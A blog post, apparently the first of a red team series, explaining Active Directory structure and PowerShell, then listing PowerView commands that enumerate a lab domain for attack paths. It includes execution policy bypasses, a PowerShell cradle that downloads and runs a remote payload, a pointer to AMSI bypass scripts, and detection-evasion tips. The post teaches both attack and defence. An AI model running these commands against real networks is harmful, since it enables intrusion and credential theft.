I attended the Pentester Academy Certified Red Team Professional course, so I’ll start a blog post series to share my knowledge about Active Directory from fundamentals to forest compromise and beyond.
For a beginner in this area, the Pentester Academy course and its instructor Nikhil Mittal proved useful and interesting.
What is Active Directory ?
Active Directory (AD) is a directory service that runs on Microsoft Windows Server. The main function of AD is to enable administrators to manage permissions and control access to network resources. In AD, data is stored as objects, which include users, groups, applications and devices, and these objects are categorized according to their name and attributes.
Active Directory Components
Domain Services (AD DS) are the core components of Active Directory and provide the primary mechanism for authenticating users and determining which network resources they can access. AD DS also provides additional features such as Single Sign-On (SSO), security certificates, LDAP, and access rights management.
In order to understand AD DS, there are some key terms to define.
- Schema: The set of user configured rules that govern objects and attributes in AD DS;
- Global Catalog: The container of all objects in AD DS. If you need to find the name of a user, that name is stored in the Global Catalog;
- Query and Index Mechanism: This system allows users to find each other in AD. A good example would be when you start typing a name in your mail client, and the mail client shows you possible matches;
- Replication Service: The replication service makes sure that every DC on the network has the same Global Catalog and Schema;
- Sites: Sites are representations of the network topology, so AD DS knows what objects go together to optimize replication and indexing;
- Lightweight Directory Access Protocol: LDAP is a protocol that allows AD to communicate with other LDAP enabled directory services across platforms.
Lightweight Directory Services: AD LDS is a Lightweight Directory Access Protocol (LDAP) directory service. It provides only a subset of the AD DS features, which makes it more versatile in terms of where it can be run. For example, it can be run as a stand-alone directory service without needing to be integrated with a full implementation of Active Directory.
Certificate Services: You can create, manage and share encryption certificates, which allow users to exchange information securely over the internet.
Active Directory Federation Services: ADFS is a Single Sign-On (SSO) solution for AD, which allows employees to access multiple applications with a single set of credentials, thus simplifying the user experience.
Rights Management Services: AD RMS is a set of tools that assists with the management of security technologies that will help organizations keep their data secure. Such technologies include encryption, certificates, and authentication, and cover a range of applications and content types, such as emails and Word documents.
The server hosting AD DS is called a domain controller (DC). A domain controller can also be used to authenticate with other MS products, such as Exchange Server, SharePoint Server, SQL Server, File Server, and more.
Active Directory Structure
The Active Directory structure consists of three main components: domains, trees, and forests. Several objects, like users or devices that use the same AD database, can be grouped into a single domain. Domains have a domain name system (DNS) structure. Multiple domains can be combined to form a group known as a tree. The tree structure uses a contiguous namespace to arrange domains in a logical hierarchy. Different domains in a tree share a secure connection and trust each other in a hierarchy. This means the first domain can implicitly trust the third domain in a hierarchy. A collection of multiple trees is called a forest.
A domain could be divided into multiple OUs (organization units); this is the smallest logical division which could be made in an Active Directory environment and into this you can place users, groups, computers and other organizational units. You can create organizational units to mirror your organization functional or business structure.
A forest is considered as a security boundary, may contain multiple domains and each domain may contain multiple groups and OUs. Due to domain trust in a forest, it is necessary to pay attention that for Microsoft Windows only a forest is considered as a security boundary and when in a forest there is only a domain that needs to be considered a forest too.
In order to explore an Active Directory domain we need some tool to automate and make this task easier.
Powershell will be our best friend in this case, there are already several scripts to explore and find a path to compromise a Domain.
What is powershell and its features?
PowerShell is a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.
- Provides access to almost everything in a Windows platform and Active Directory Environment which could be useful for an attacker.
- Provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes.
- Easy to learn and really powerful.
- Based on .NET framework and is tightly integrated with Windows
- Exists a platform independent version of Powershell core.
Powershell Help System
The Help System is useful to understand cmdlets parameters, their combinations and so on.
- Shows a brief help about the cmdlet or topic.
- Supports wildcard
- Comes with various options and filters
- Get-Help, Help and -? Could be used to display help.
- Get-Help About_<topic> could be used to get help for conceptual topics
List everything about the help topics: `Get-Help *`
- List everything which contains the word process: `Get-Help process`
- In order to update help use the following command: `Update-Help
- List full help about a topic (Get-Item cmdlet in this case): `Get-Help Get-Item -Full`
- List examples of how to run a cmdlet (Get-Item cmdlet in this case):`Get-Help Get-Item -Examples`
As we mentioned before cmdlets are powershell functions built-in or created by importing a script, useful to execute custom actions.
- Cmdlets are used to perform an action and a .NET object is returned as the output.
- Cmdlest accept parameters for different operations
- They have aliases
- These are NOT executables, you can write your own cmdlet with a few lines of script.
To list all cmdlets `Get-Command -CommandType cmdlet` .
An interesting cmdlet could be Get-Process, it gets the processes on a local or remote computer.
Users in a domain will be organized in OUs, groups, etc….. During a domain compromise an attacker could try to target a user (compromise a user account more privileged).
- Use cmdlets, native commands, functions, .NET, DLLs, Windows API and much more in a single “Program”
- Powershell scripts are really powerful and could do much stuff in less lines
- Easy syntax and easy to execute
Powershell Scripts: Execution Policy
Powershell prevents users from accidentally executing scripts and there are several ways to bypass it.
- Powershell -ExecutionPolicy(-ep) bypass
- Powershell -c <cmd>
- Powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass”
Powershell scripts execution remote code
An attacker can download an external payload with the following command:
- iex(New-Object Net.WebClient).DownloadString(‘http://<ip>/payload.ps1’)
For the new version of powershell this syntax is available too.
- PSv3 onwards: iex(iwr ‘http://<ip>/payload.ps1’)
Powershell and AD
In order to enumerate a domain is necessary work with built-in windows functions.
Active Directory Service Interface
Active Directory Service Interfaces (ADSI) are a set of COM interfaces used to access the features of directory services from different network providers. ADSI is used in a distributed computing environment to present a single set of directory service interfaces for managing network resources. Administrators and developers can use ADSI services to enumerate and manage the resources in a directory service, no matter which network environment contains the resource.
System.DirectoryServices.ActiveDirectory Namespace defines a set of domain controllers that are well-connected in terms of speed and cost. A site object consists of a set of one or more IP subnets.
Provides a high level abstraction, object model that builds around Microsoft Active Directory service tasks. The Active Directory service concepts such as forest, domain, site, subnet, partition, and schema are part of the object model.
Sometimes the connection with other computers in the domain could be achieved using some of native executable like winrs, runas, etc.…
Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems. You can write WMI scripts or applications to automate administrative tasks on remote computers, but WMI also supplies management data to other parts of the operating system and products, for example System Center Operations Manager, formerly Microsoft Operations Manager (MOM), or Windows Remote Management (WinRM).
Methodology – assume breach
To test our knowledge we created our test lab with several misconfigurations.
To simulate a realistic red-teaming environment, we assume a breach, where there is already an attacker inside the domain as a low privileged user. Some of the remediations (blue-teaming) will be discussed too.
Insider attack simulation
An attacker usually attacks in a cyclic way, starting from the recon to understand the current situation and find some attack paths. This step will be performed each time a new machine is compromised.
- Domain Enum
- Local Priv Esc
- Admin Recon
- C2 ( lateral movement, domain admin privs, cross trust attack)
- Persist and exfiltrate
How AMSI Works
When a user executes a script or initiates PowerShell, the AMSI.dll is injected into the process memory space. Prior to execution the following two API’s are used by the antivirus to scan the buffer and strings for signs of malware.
If a known signature is identified, execution doesn’t initiate and a message appears that the script has been blocked by the antivirus software. The following diagram illustrates the process of AMSI scanning.
Microsoft implemented AMSI as a first defense to stop execution of malware multiple evasions have been publicly disclosed. Since the scan is signature based, red teams and threat actors could evade AMSI by conducting various tactics. Even though some of the techniques in their original state are blocked, modification of strings and variables, encoding and obfuscation could revive even the oldest tactics. Offensive tooling also supports AMSI bypasses that could be used in red team engagements prior to any script execution but manual methods could be also deployed.
Some AMSI bypass scripts could be retrieved from this website: https://amsi.fail
It is necessary to enumerate and map various entities, trusts, relationships and privileges for the target domain.
The enumeration can be done by using Native executables and .NET classes:
Or as we prefer PowerView.ps1 and the ActiveDirectory Powershell module.
Some tools to automate the domain discovery have been created like BloodHound.
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. But tool like this has a cons they are heavy in logging and traffic.
We are going to see some commands to enumerate the domain and find misconfiguration and attack path. With tips and consideration, for red and blue teamers.
Get Current Domain
With this command an attacker could be able to obtain information about the current domain.
The output of this command shows some of the domains hierarchy, the current user is located in a child-domain (dev.pwnx.corp) and there is another child-domain (amm.pwnx.corp) in the Forest .The parent domain is pwnx.corp.
Get Object of another Domain
In a domain everything is considered an object (computers, groups, users, etc …)
PowerView: `Get-NetDomain -Domain test.lab`
Get-NetDomain accepts the Domain parameter, which allows querying another reachable domain.
Get Domain Policy
A domain policy defines some constraints about the domain.
The Kerberos policy is the most interesting, in order to create tickets (with normal value) in the current context an attacker needs to know these limits.
With PowerView to check single a policy for the current Domain: `(Get-DomainPolicyData).systemaccess`
Tip: When an attacker would abuse an ACL like `ForceChangePassword` needs to respect the below rules to define an acceptable password.
From the output of this command an attacker could be able to understand the current Kerberos policy, to create tickets with common value in the current domain.
Get Domain sid for the current Domain
Knowing the domain SID will be useful during cross-domain attacks and to recognize all the objects of the domain (computer, users, groups, etc….), because during a tickets creation in a cross-domain attack the domain SID will be a parameter of our Mimikatz command.
Get Domain Controllers for the current Domain
The domain controller is the most valuable target in a domain. A domain can have more than one DC, in this case we have defined only one.
The command output allows to know the DC OS version, the IP address, if it is located in the default site and the roles of the domain controller.
Get Domain Controllers for another Domain
PowerView: `Get-NetDomainController -Domain test.lab`
Get info about specific user for the current Domain
Users in a domain will be organized in OUs, groups. During a domain compromise an attacker could try to attack a user.
From the output of this command an attacker could be able to determine the service accounts or the unused accounts. Unused accounts have to be discarded from the attack surface because the login attempt would be noticed immediately.
To request a single user with PowerView: `Get-NetUser -Username testaccount`
This command will be useful if we want to target a particular user.
Get a list of all properties for users in the current domain
Sometimes users write in the `Description` their password as a reminder, with a simple filter on this field you could be able to retrieve a plain text password and obtain a working login.
Get a property for users in the current domain
PowerView: `Get-UserProperty -Properties pwdlastset`
The property `logoncount` could be a useful information, it shows how many times a user made a login.
During a red-teaming session, it is suggested to not impersonate or escalate to account with 0 at logoncount, this could be easily detected from the blue team .
Some blue teamers could create decoy objects, like users, to find attackers in the network. A real user couldn’t have the logoncount property to 0.
Search for a particular string in a user’s attributes
PowerView: `Find-UserField -SearchField Description -SearchTerm “built”`
Reminder: Sometimes passwords could be found into user attributes like “description”, usually for a service account.
Get a list of computers in the current domain
This command could be useful because you can identify machines and define a list of possible targets. Additionally, you could filter the results based on the OS version to find machines vulnerable to remote exploits.
PowerView: `Get-NetComputer -FullData`
Get all the groups the current domain
Query groups will be useful to understand the domain divisions, interesting group membership and create a real map of the domain. The attention could be focused on default High Privileged groups like Account Operators, Backup Operators, DNS Admins, etc …
For another domain: PowerView: `Get-NetGroup <target domain>`
Groups with admin in group name: PowerView: `Get-NetGroup *admin*`
The Enterprise Admins group will be visible only if you query the forest.
Get Group Members
Retrieving the members of a group could be useful to determine a path to follow in order to compromise an initial user and abuse some group ACLs. Define users membership an their rights.
PowerView: `Get-NetGroupMember -GroupName “Domain Admins” -Recurse`
Get the Group Membership for a user
An attacker with a list of usernames might execute the reverse procedure. Determine the membership of each users recursively, in order to understand user privileges.
PowerView: `Get-NetGroup -Username “testad”`
The technique to rename the default Administrator, in order to hide this account isn’t a good practice. It could be easily identified by the SID (500).
Reference to SID list: https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/security-identifiers-in-windows
Blue Team TIP: Renaming the local admin on a non-DC machine might be a good practice. Makes it difficult to list the local administrator if a user does not have local administrative access on the current machine.
Find shares on the host in the current domain
Shares could contain sensitive data, files or could be a good entry to overwrite a widely used file with a malware.
PowerView: `Invoke-ShareFinder -Verbose`
Find sensitive files on computers in the domain
As mentioned before files in shares could contain sensitive info.
PowerView: `InvokeFileFinder -Verbose`
Get all file servers of the domain
PowerView: `Invoke-NetFileServer -Verbose`
Note: the three previous commands are easily detectable by blue teams, since they generate a lot of traffic. To list shares or documents it is necessary to interact with each machine of the Domain, while commands executed before interact only with the DC.
This is the first blog post of a series, stay tuned !